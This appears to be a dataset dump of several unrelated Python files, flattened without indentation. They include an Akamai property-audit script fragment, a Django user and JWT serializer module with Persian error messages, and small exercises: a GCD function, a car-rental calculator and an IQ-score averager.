edgerc = EdgeRc(home+"/.edgerc")
if args['section']:
section = args['section']
else:
section = 'papi'
host = edgerc.get(section,'host')
except Exception as e:
logger.debug("Error Autehticating Edgerc {}.".format(home+edgerc))
http = requests.Session()
http.auth= EdgeGridAuth.from_edgerc(edgerc,section)
validActions = ["ListGroups","ListContracts","ListProperties","GetRuleTree","SearchProperty"]
if action not in validActions:
parser.error("Error: PAPI Unknown Action")
#ListGroups
elif action == validActions[0]:
if args['verbose']:
logger.debug("Listing account groups with PAPI.")
if args['account_key']:
endpoint='/papi/v1/groups?accountSwitchKey={}'.format(args['account_key'])
else:
endpoint= '/papi/v1/groups'
result = http.get(urljoin("https://" + host + "/", endpoint))
response = json.loads(json.dumps(result.json()))
http.close()
return response
#ListProperties
elif action == validActions[2]:
gps = propertyManagerAPI("ListGroups")
if gps is None:
logger.warning("No Groups were found in account!")
return None
# elif gps['incidentId']:
# logger.error('{}'.format(gps['title']))
# return None
for gp in gps['groups']['items']:
for contract in gp['contractIds']:
if args['verbose']:
logger.debug("Listing properties in '{}'/'{}' with PAPI.".format(gp['groupId'],contract))
if args['account_key']:
endpoint= '/papi/v1/properties?contractId={}&groupId={}&accountSwitchKey={}'.format(contract,gp['groupId'],args['account_key'])
else:
endpoint= '/papi/v1/properties?contractId={}&groupId={}'.format(contract,gp['groupId'])
result = http.get(urljoin("https://" + host + "/", endpoint))
http.close()
response = json.loads(json.dumps(result.json()))
for p in response['properties']['items']:
if p['productionVersion'] is None or p is None:
item={}
er=[]
er.append("The configuration has no active version in production.")
if args['verbose']:
logger.warning("The configuration '{}' has no active version in production.".format(p['propertyName']))
item['propertyName']=p['propertyName']
item['errors']=er
item_list.append(item)
else:
p['propertyVersion']=p['productionVersion']
del p['productionVersion']
propertyManagerAPI("GetRuleTree","",p)
elif action == validActions[3]:
if args['verbose']:
logger.debug("Getting rule tree for the '{}' property with PAPI.".format(p['propertyName']))
if args['account_key']:
endpoint= "/papi/v1/properties/{}/versions/{}/rules?contractId={}&groupId={}&validateRules=true&validateMode=fast&accountSwitchKey={}".format(
p['propertyId'],
p['propertyVersion'],
p['contractId'],
p['groupId'],
args['account_key']
)
else:
endpoint= "/papi/v1/properties/{}/versions/{}/rules?contractId={}&groupId={}&validateRules=true&validateMode=fast".format(
p['propertyId'],
p['propertyVersion'],
p['contractId'],
p['groupId']
)
result = http.get(urljoin("https://" + host + "/", endpoint))
http.close()
readObject(json.loads(json.dumps(result.json())) ,"API",p['propertyName'])
elif action == validActions[4]:
if args['verbose']:
logger.debug("Looking for the configuration '{}'.".format(config))
if args['account_key']:
endpoint='/papi/v1/search/find-by-value?accountSwitchKey={}'.format(args['account_key'])
else:
endpoint='/papi/v1/search/find-by-value'
postbody = {}
postbody['propertyName'] = config
result = http.post(urljoin("https://" + host + "/", endpoint),json.dumps(postbody), headers={"Content-Type": "application/json"})
http.close()
if result.json()['versions']['items'] == []:
item={}
er=[]
item['propertyName']=config
if args['verbose']:
logger.warning("The configuration '{}' was not found.".format(config))
er.append("The configuration was not found.")
item['errors']=er
item_list.append(item)
return
else:
if args['verbose']:
logger.debug("The configuration '{}' was found.".format(config))
prodversion = None
for i in result.json()['versions']['items']:
if i['productionStatus'] == "ACTIVE":
prodversion = True
propertyManagerAPI("GetRuleTree","",i)
if prodversion is None:
item={}
er=[]
if args['verbose']:
logger.warning("The configuration '{}' has no active version in production.".format(config))
er.append("The configuration has no active version in production.")
item['propertyName']=config
item['errors']=er
item_list.append(item)
return json.loads(json.dumps(result.json()))
return None
def main():
if args['version']:
print(version)
return
if not args['audit']:
parser.print_help()
if args['verbose']:
configure_logging()
logger.info("[start]")
if args['audit'] == "list":
if args['domains'] is None:
parser.error("--domains is required to provide list of domains.")
else:
getCertificates(args['domains'])
printJson()
elif (args['audit'] == "file"):
if (args['file'] is None):
parser.error("--file is required to provide the file to audited.")
else:
readObject(args['file'],args['file_type'])
printJson()
elif (args['audit'] == "config"):
if args['config_name'] is None:
parser.error("--config-name is required to provide configuration to be audited.")
else:
for i in args['config_name']:
propertyManagerAPI("SearchProperty",i)
printJson()
elif (args['audit'] == "account"):
#a = readEdgeRC()
propertyManagerAPI("ListProperties")
printJson()
if __name__ == '__main__':
main()
|
11,095 | fbffe98481625d15b92767f836673c19e2b1e9a6 | import re
from rest_framework import serializers
from django.contrib.auth import get_user_model, authenticate
from django.contrib.auth.models import update_last_login
from django.utils.translation import gettext as _
from rest_framework_jwt.settings import api_settings
from wallet.serializers import WalletSerializer
JWT_PAYLOAD_HANDLER = api_settings.JWT_PAYLOAD_HANDLER
JWT_ENCODE_HANDLER = api_settings.JWT_ENCODE_HANDLER
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('id', 'email', 'first_name', 'last_name', 'nick_name', 'profile_image', 'phone_number', 'password')
extra_kwargs = {
'id': {
'read_only': True
},
'password': {
'min_length': 5,
'write_only': True,
'style': {
'input_type': 'password'
}
},
'email': {
'error_messages': {
'blank': 'ایمیل را وارد کنید.',
'unique': 'کاربری با این ایمیل موجود می باشد.'
}
},
'first_name': {
'error_messages': {
'max_length': 'نام نهایتا می تواند 30 کاراکتر باشد.',
'blank': 'نام را وارد کنید.'
}
},
'last_name': {
'error_messages': {
'max_length': 'نام خانوادگی نهایتا می تواند 50 کاراکتر باشد.',
'blank': 'نام خانوادگی را وارد کنید.'
}
},
'phone_number': {
'error_messages': {
'max_length': 'ماره تلفن نهایتا می تواند 13 کاراکتر باشد.'
}
},
'profile_image': {
'error_messages': {
'invalid_extension': 'فقط فایل های با پسوند jpg و png و jpeg قابل قبول می باشند'
}
}
}
def create(self, validated_data):
user = get_user_model().objects.create_user(**validated_data)
return user
def validate_phone_number(self, value):
if not value:
return value
# raise serializers.ValidationError(
# _('شماره تلفن را وارد کنید.')
# )
if not re.match(
pattern="(0|\+98)?([ ]|-|[()]){0,2}9[1|2|3|4]([ ]|-|[()]){0,2}(?:[0-9]([ ]|-|[()]){0,2}){8}",
string=value
):
raise serializers.ValidationError(
_('شماره تلفن وارد شده معتبر نمی باشد.'),
code='invalid'
)
return value
class EditUserSerializer(serializers.ModelSerializer):
wallet = serializers.SlugRelatedField(slug_field='amount', read_only=True)
class Meta:
model = get_user_model()
fields = ('email', 'first_name', 'last_name', 'nick_name', 'profile_image', 'phone_number', 'wallet')
extra_kwargs = {
'email': {
'error_messages': {
'blank': 'ایمیل را وارد کنید.',
'unique': 'کاربری با این ایمیل موجود می باشد.'
}
},
'first_name': {
'error_messages': {
'max_length': 'نام نهایتا می تواند 30 کاراکتر باشد.',
'blank': 'نام را وارد کنید.'
}
},
'last_name': {
'error_messages': {
'max_length': 'نام خانوادگی نهایتا می تواند 50 کاراکتر باشد.',
'blank': 'نام خانوادگی را وارد کنید.'
}
},
'phone_number': {
'error_messages': {
'max_length': 'ماره تلفن نهایتا می تواند 13 کاراکتر باشد.'
}
},
'profile_image': {
'error_messages': {
'invalid_extension': 'فقط فایل های با پسوند jpg و png و jpeg قابل قبول می باشند'
}
},
'wallet': {
'read_only': True
}
}
def validate_phone_number(self, value):
if not value:
return value
# raise serializers.ValidationError(
# _('شماره تلفن را وارد کنید.')
# )
if not re.match(
pattern="(0|\+98)?([ ]|-|[()]){0,2}9[1|2|3|4]([ ]|-|[()]){0,2}(?:[0-9]([ ]|-|[()]){0,2}){8}",
string=value
):
raise serializers.ValidationError(
_('شماره تلفن وارد شده معتبر نمی باشد.'),
code='invalid'
)
return value
class UserTokenSerializer(serializers.Serializer):
class Meta:
fields = ('email', 'password', 'token')
extra_kwargs = {
'password': {
'style': {
'input_type': 'password'
},
'min_length': 5,
'write_only': True,
'error_message': {
'required': 'رمزعبور را وارد کنید'
}
},
'email': {
'error_message': {
'required': 'ایمیل را وارد کنید'
}
}
}
email = serializers.EmailField(max_length=255, required=True)
password = serializers.CharField(max_length=255, write_only=True, required=True)
token = serializers.CharField(max_length=255, read_only=True)
def validate(self, attrs):
email = attrs.get('email', None)
password = attrs.get('password', None)
user = authenticate(email=email, password=password)
if not user:
raise serializers.ValidationError(
'کاربر با این اطلاعات پیدا نشد.',
code='INVALID_CREDENTIAL'
)
if not user.is_active:
raise serializers.ValidationError(
'حساب کاربری شما فعال نمی باشد',
code='USER_NOT_ACTIVE'
)
try:
payload = JWT_PAYLOAD_HANDLER(user)
token = JWT_ENCODE_HANDLER(payload)
update_last_login(None, user)
except get_user_model().DoesNotExists:
raise serializers.ValidationError(
'کاربر با ایمیل داده شده پیدا نشد.',
code='INVALID_CREDENTIAL'
)
return {
'email': user.email,
'token': token
}
class ChangePasswordSerializer(serializers.Serializer):
old_password = serializers.CharField(
required=True,
min_length=5,
error_messages={
'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
}
)
new_password = serializers.CharField(
required=True,
min_length=5,
error_messages={
'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
}
)
class Meta:
fields = ('old_password', 'new_password')
extra_kwargs = {
'old_password': {
'write_only': True,
'style': {
'input_type': 'password'
},
'error_messages': {
'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
}
},
'new_password': {
'write_only': True,
'style': {
'input_type': 'password'
},
'error_messages': {
'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
}
}
}
class ResetPasswordSerializer(serializers.Serializer):
class Meta:
fields = ('reset_code', 'new_password')
extra_kwargs = {
'new_password': {
'min_length': 5,
'style': {
'input_type': 'password'
},
'write_only': True,
'error_messages': {
'required': 'رمز جدید را وارد کنید',
'min_length': 'رمز باید بیشتر از 5 کاراکتر باشد'
}
}
}
reset_code = serializers.IntegerField(required=True)
new_password = serializers.CharField(min_length=5, required=True) |
11,096 | e38b7dc98a9ff5e334cdb7562987d61df60cf7c5 | '''
Created on Sep 5, 2019
@author: achaturvedi
'''
answer = 17
if answer != 42:
print("That is not the correct answer. Please try again") |
11,097 | 9f1fcb0ef36447c490f5a436d7827caf75bcb832 | def gcdEuclidAdv(m,n):
if m>n:
(m,n)=(n,m)
if(m%n) == 0:
return n;
else:
return gcdEuclidAdv(n,m%n)
m = int (input("Enter m value : "))
n = int (input("Enter n value : "))
print(gcdEuclidAdv(m,n)) |
11,098 | 2d09b9d26c9f7ef5ff786061e6b3b6eb7e2d20fc | km_percorridos=float(input("Digite os kilometros percorridos: "))
dias_alugado=int(input("Quantidade de dias que o carro foi alugado: "))
aluguel=dias_alugado*60
valor_km=km_percorridos*0.15
total_aluguel=aluguel+valor_km
print("O valor a pagar por dias locado fica R$%5.2f e o valor pela quantidade de Km rodados fica R$%5.2f"%(aluguel,valor_km))
print("O total a pagar pelo aluguel do carro fica R$%5.2f" %total_aluguel)
print("Obrigada") |
11,099 | ffda8c77c2895d334472eb1cfb8f2cedc0e9d4ab | # Напишите программу, которая обрабатывает результаты IQ-теста из файла “2-in.txt".
# В файле лежат несколько строк со значениями(не менее 4-х).
# Программа должна вывести в консоль среднее арифметическое по лучшим трем в каждой строке результатам(одно число).
a = []
n = []
t = True
f = open('2-in.txt')
for line in f:
a.append(line)
f.close()
b = []*3*len(a)
for i in range(len(a)):
s = a[i].split(' ')
for k in range(len(s)):
if s[k].isdigit() == t:
n.append(s[k])
n = map(int, n)
n = sorted(n)
for h in range(len(n) - 3, len(n)):
b.append(n[h])
n = []
print(sum(b)/len(b))
input() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.